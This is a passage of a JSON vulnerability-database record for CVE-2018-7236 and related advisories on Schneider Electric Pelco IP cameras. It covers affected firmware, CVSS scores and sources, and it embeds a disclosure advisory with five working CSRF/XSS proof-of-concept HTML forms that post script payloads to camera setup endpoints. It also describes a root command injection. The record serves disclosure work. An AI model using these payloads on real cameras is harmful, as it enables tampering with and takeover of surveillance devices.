"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "NVD",
"id": "CVE-2018-7236"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:mps110-1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:mps110-1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imps110-1er_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imps110-1er:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ibps110-1er_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ibps110-1er:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imp1110-1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imp1110-1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imp1110-1e_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imp1110-1e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imp1110-1er_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imp1110-1er:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ibp1110-1er_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ibp1110-1er:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imp219-1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imp219-1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imp219-1e_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imp219-1e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imp219-1er_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imp219-1er:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ibp219-1er_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ibp219-1er:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imp319-1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imp319-1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imp319-1e_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imp319-1e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ibp319-1er_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ibp319-1er:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imp519-1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imp519-1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imp319-1er_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imp319-1er:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imp519-1e_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imp519-1e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imp519-1er_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imp519-1er:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ibp519-1er_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ibp519-1er:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:imps110-1e_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "3.29.67",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:imps110-1e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7236"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
],
"trust": 0.3
},
"cve": "CVE-2018-7236",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-7236",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-23302",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-05330",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-7236",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7236",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-05330",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-053",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5416",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "NVD",
"id": "CVE-2018-7236"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-053"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability exists in Schneider Electric\u0027s Pelco Sarix Professional in all firmware versions prior to 3.29.67 which could enable SSH service due to lack of authentication for /login/bin/set_param could enable SSH service. Schneider Electric Pelco Sarix Professional Contains an authentication vulnerability.Information may be obtained and information may be altered. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectricPelcoSarixProfessional is a video surveillance device from Schneider Electric, France. A security vulnerability exists in SchneiderElectricPelcoSarixProfessional with firmware prior to 3.29.67, which was caused by a program failing to authenticate to /login/bin/set_param. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter \u0027enable_leds\u0027 locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. \nSchneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities\n\n\nVendor: Schneider Electric SE\nProduct web page: https://www.pelco.com\nAffected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)\n Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)\n Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)\n\nSummary: Pelco offers the broadest selection of IP cameras designed\nfor security surveillance in a wide variety of commercial and industrial\nsettings. From our industry-leading fixed and high-speed IP cameras to\npanoramic, thermal imaging, explosionproof and more, we offer a camera\nfor any environment, any lighting condition and any application. \nWhen nothing but the best will do. SarixaC/ Enhanced Range cameras\nprovide the most robust feature-set for your mission-critical applications. \nWith SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image\nin difficult lighting conditions such as a combination of bright areas,\nshaded areas, and intense light. Designed with superior reliability,\nfault tolerance, and processing speed, these rugged fixed IP cameras\nensure you always get the video that you need. \n\nDesc: Pelco cameras suffer from multiple dom-based, stored and reflected\nXSS vulnerabilities when input passed via several parameters to several\nscripts is not properly sanitized before being returned to the user. \n\nTested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown\n MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)\n Lighttpd/1.4.28\n PHP/5.3.0\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2017-5415\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php\n\n\n07.04.2017\n\n--\n\n\nCSRF/XSS on username parameter:\n-------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/dot1x/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"dot1x\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"protocol\" value=\"EAP\u0026#45;TLS\" /\u003e\n \u003cinput type=\"hidden\" name=\"inner\u0026#95;auth\" value=\"CHAP\" /\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\u0027\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"blah\" /\u003e\n \u003cinput type=\"hidden\" name=\"anonymous\u0026#95;id\" value=\"\u0026#13;\" /\u003e\n \u003cinput type=\"hidden\" name=\"ca\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"client\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\u0026#95;password\" value=\"test\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:\n-------------------------------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\u0027\"\u003e\u003cscript\u003ealert(2)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"http\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(3)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"rtsp\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"dhcp\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\u0027\"\u003e\u003cscript\u003ealert(5)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\u0027\"\u003e\u003cscript\u003ealert(6)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"gateway\" value=\u0027\"\u003e\u003cscript\u003ealert(7)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"nameservers\" value=\u0027\"\u003e\u003cscript\u003ealert(8)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on version parameter:\n------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/snmp/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"version\" value=\u0027\";alert(9)//\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;community\u0026#95;string\" value=\"public\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;receiver\u0026#95;address\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;trap\u0026#95;community\u0026#95;string\" value=\"trapbratce\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:\n----------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/system/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"device\u0026#95;name\" value=\u0027ZSL\"\u003e\u003cscript\u003ealert(10)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;leds\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"smtp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(11)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\u0026#95;from\u0026#95;dhcp\" value=\"false\" /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\" value=\"\u0027;alert(12)//\u0027\" /\u003e\n \u003cinput type=\"hidden\" name=\"region\" value=\"Macedonia\u0027;alert(13)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"zone\" value=\"Kumanovo\u0027;alert(14)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;time\u0026#95;overlay\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;name\u0026#95;overlay\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"position\" value=\"topright\" /\u003e\n \u003cinput type=\"hidden\" name=\"date\u0026#95;format\" value=\"0\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nXSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:\n--------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/events/handlers/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"id\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;sentinel\" value=\"relay\u0026#95;sentinel\" /\u003e\n \u003cinput type=\"hidden\" name=\"name\" value=\u0027\"\u003e\u003cscript\u003ealert(15)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"type\" value=\"Ftp\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;to\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;from\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;subject\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;message\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\u0026#95;scale\" value=\"K\" /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(16)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;username\" value=\u0027\"\u003e\u003cscript\u003ealert(17)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;password\" value=\u0027\"\u003e\u003cscript\u003ealert(18)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;base\u0026#95;path\" value=\u0027\"\u003e\u003cscript\u003ealert(19)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;bankName\" value=\"GPIO\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;index\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;on\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;off\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;pulse\u0026#95;count\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;start0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;stop0\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7236"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002614"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2018-05330"
},
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5416"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "PACKETSTORM",
"id": "143313"
}
],
"trust": 3.06
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelco_rce.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_csrf.txt",
"trust": 0.1,
"type": "poc"
},
{
